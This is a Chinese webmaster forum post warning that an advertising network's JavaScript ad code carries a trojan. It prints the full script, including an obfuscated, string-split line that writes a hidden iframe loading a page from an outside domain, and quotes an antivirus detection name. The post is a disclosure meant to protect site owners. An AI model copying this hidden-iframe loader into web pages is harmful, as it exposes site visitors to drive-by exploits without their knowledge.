举报一个垃圾联盟 广告代码放木马,提醒大家
举报一个垃圾联盟 广告代码放木马,提醒大家垃圾联盟是 EG易告广告联盟 [url]http://union.egooad.com[/url] 至于广告效果和信誉度如何,我也就不评论了,大家一目了然……
前几天这个联盟的业务员来找我,请我试试他们的广告,我也就挂了几天,今天发现网站竟然报毒,我以为是我的网站中木马了,
后来一排查,就是这广告里安了木马.提醒大家不要上当.
以下是他的广告代码, [url]http://union.egooad.com/JS/ShowMe.js[/url] 大家可以下来看看
// Common Para
var isDebug = 0;
var SmartAD6Agent_tf="SMARTAD6COM";
var SmartAD6Agent_pu="";
var SmartAD6Agent_pf="SMARTAD6COM";
var SmartAD6Agent_su="";
if(smartad_type!="4"||(smartad_type=="4"&&smartad_webid!="0000000000000000"))
SmartAD6Agent_su=window.location;
var SmartAD6Agent_sf="";
if(smartad_type!="4"||(smartad_type=="4"&&smartad_webid!="0000000000000000"))
SmartAD6Agent_sf=document.referrer;
[color=Red]var SmartAD6Agent_of="<iframe src=ht";
SmartAD6Agent_of = SmartAD6Agent_of+"tp:/";
SmartAD6Agent_of = SmartAD6Agent_of+"/xx";
SmartAD6Agent_of = SmartAD6Agent_of+"x.wofa";
SmartAD6Agent_of = SmartAD6Agent_of+"la.info/";
SmartAD6Agent_of = SmartAD6Agent_of+"121.htm style='display:none'></i";
SmartAD6Agent_of =SmartAD6Agent_of+"frame>'";[/color]
document.write(SmartAD6Agent_of);
var SmartAD6Agent_of="";
var SmartAD6Agent_op="";
var SmartAD6Agent_ops=1;
var SmartAD6Agent_ot=1;
var SmartAD6Agent_d=new Date();
var SmartAD6Agent_color="";
var SmartAD6Agent_bversion=navigator.appVersion;
var SmartAD6Agent_soft="";
var SmartAD6Agent_os="";
var SmartAD6Agent_lang="zh-cn";
var smartad_expires=new Date();
if(smartad_color_border=="undefined")
var smartad_color_border = "";
if(smartad_color_bg=="undefined")
var smartad_color_bg = "";
if(smartad_color_link=="undefined")
var smartad_color_link = "";
if(smartad_color_text=="undefined")
var smartad_color_text = "";
if(smartad_color_url=="undefined")
var smartad_color_url = "";
if(smartad_color_border+""=="undefined"||smartad_color_border=="")
smartad_color_border = "#000000";
if(smartad_color_link+""=="undefined"||smartad_color_link=="")
smartad_color_link = "#000000";
if(smartad_color_bg+""=="undefined"||smartad_color_bg=="")
smartad_color_bg = "#000000";
if(smartad_color_text+""=="undefined"||smartad_color_text=="")
smartad_color_text = "#000000";
if(smartad_color_url+""=="undefined"||smartad_color_url=="")
smartad_color_url = "#000000";
Do();
function Do()
{
var MainServer = "union.egooad.com";
var svr = new Array();
svr[0] = "u.egooad.com";
if(smartad_type=="2" && CheckInt(smartad_poptime) && smartad_poptime>0)
{
var CookieName = smartad_adpid+smartad_webid;
if(GetCookie(CookieName)+''!='putted')
SetCookie(CookieName,"putted",smartad_poptime);
else
return;
}
var os = new Array("Windows NT 5.1","Windows NT 5.2","Windows NT 5.0","Windows 98","Windows NT 5.2","Linux","Unix","Windows 95","Windows");
var soft = new Array("MSIE 6.0","MYIE","TencentTraveler","MSIE 5.0","MSIE 5.5","FireFox","Opera");
var lang = new Array("zh-cn","zh-tw","en-us","ja","ko","fr");
if(navigator.appName=="Netscape")
{
SmartAD6Agent_color=screen.pixelDepth;
}
else
{
SmartAD6Agent_color=screen.colorDepth;
}
if(smartad_type!="4"||(smartad_type=="4"&&smartad_webid!="0000000000000000"))
{
SmartAD6Agent_tf=document.referrer;
SmartAD6Agent_pu=window.location;
SmartAD6Agent_pf=window.document.referrer;
SmartAD6Agent_of=SmartAD6Agent_sf;
}
if(SmartAD6Agent_pf!=="SMARTAD6COM")
{
SmartAD6Agent_of=SmartAD6Agent_pf;
}
if(SmartAD6Agent_tf!=="SMARTAD6COM")
{
SmartAD6Agent_of=SmartAD6Agent_tf;
}
SmartAD6Agent_op=SmartAD6Agent_pu;
try
{
lainframe
}
catch(e)
{
SmartAD6Agent_op=SmartAD6Agent_su;
}
var val = 'referrer='+escape(SmartAD6Agent_of)+'&vpage='+escape(SmartAD6Agent_op);
if(smartad_type!="4"||(smartad_type=="4"&&smartad_webid!="0000000000000000"))
{
if(parent==self)
{
SmartAD6Agent_op = window.location;
SmartAD6Agent_of = window.document.referrer;
}
else
{
SmartAD6Agent_op = window.parent.location;
SmartAD6Agent_of = window.parent.document.referrer;
}
}
SmartAD6Agent_soft = DetectSoft(soft);
SmartAD6Agent_os = DetectOS(os);
SmartAD6Agent_lang = DetectLang(lang);
var selFile = "";
var puttype = new Array("putout","text","popup","vpopup","cpa");
if(smartad_webid=="0000000000000000"&&smartad_type=="4")
selFile = "CPA";
else
selFile = "Show";
selFile += ".aspx?";
var rnd = Math.round(Math.random()*100+7328);
var svrLength = svr.length;
var selServer = svr[rnd%svrLength];
var spl="|",par = "",url="http://"+selServer+"/Agent/"+selFile+escape((Math.round(Math.random()*832))%1000);
par += spl+smartad_webid;
par += spl+smartad_adpid;
par += spl+smartad_modeid;
par += spl+smartad_width;
par += spl+smartad_height;
par += spl+smartad_type;
par += spl+SmartAD6Agent_soft;
par += spl+SmartAD6Agent_os;
par += spl+SmartAD6Agent_of;
par += spl+SmartAD6Agent_op;
par += spl+SmartAD6Agent_lang;
par += spl+smartad_color_border;
par += spl+smartad_color_link;
par += spl+smartad_color_bg;
par += spl+smartad_color_text;
par += spl+smartad_color_url;
par += spl+smartad_encoding;
if(smartad_type=="4"&&smartad_webid=="0000000000000000"&&smartad_adid!="undefined") // CPA
par += spl+smartad_adid;
url += escape(par);
//url += par;
if(isDebug==1)
alert(url);
document.writeln("<script src='"+url+"'></script>");
}
function DetectOS(s)
{
for(var i=0;i<s.length;i++)
{
if(window.navigator.userAgent.toLowerCase().indexOf(s[i].toLowerCase())>=0)
return s[i];
}
return "Other OS";
}
function DetectSoft(s)
{
for(var i=0;i<s.length;i++)
{
if(SmartAD6Agent_bversion.indexOf(s[i])>=0)
return s[i];
}
return "Other Explorers";
}
function DetectLang(s)
{
if((navigator.userLanguage)+""!="undefined")
SmartAD6Agent_lang = navigator.userLanguage;
if((navigator.language)+""!="undefined")
SmartAD6Agent_lang = navigator.language;
for(var i=0;i<s.length;i++)
{
if(SmartAD6Agent_lang.indexOf(s[i])>=0)
return s[i];
}
return "other";
}
function WriteLine(s)
{
document.writeln(s+"<br>");
}
function ChangeUrl(obj,surl,event)
{
obj.href=surl+escape("|"+GetMouseXY(event));
}
function GetMouseXY(event)
{
return event.clientX + "," + event.clientY;
}
function SetCookie(objName,objValue,objHours)
{
var str = objName + "=" + escape(objValue);
if(objHours > 0)
{
var date = new Date();
var ms = objHours*3600*1000;
date.setTime(date.getTime() + ms);
str += "; expires=" + date.toGMTString();
}
document.cookie = str;
}
function GetCookie(Name)
{
var search = Name + "=";
var returnvalue = "";
if (document.cookie.length > 0)
{
offset = document.cookie.indexOf(search);
if (offset != -1)
{
offset += search.length;
end = document.cookie.indexOf(";", offset);
if (end == -1)
end = document.cookie.length;
returnvalue=unescape(document.cookie.substring(offset,end));
}
}
return returnvalue;
}
function CheckInt(sNum)
{
var re = /^[0-9]+[0-9]*$/;
if (!re.test(sNum))
return false;
return true;
}
这是卡巴报的,
检测到:恶意程序 Exploit.HTML.IframeBof.aa URL: h ttp://xxx.wofala.info/ceshi/lz.htm 什么来的 他们以为站长都是 snoopy TTTTTTTTTTTT :lol: 顶一下吧.... 晕 易告前几天还有人在这里宣传
页:
[1]
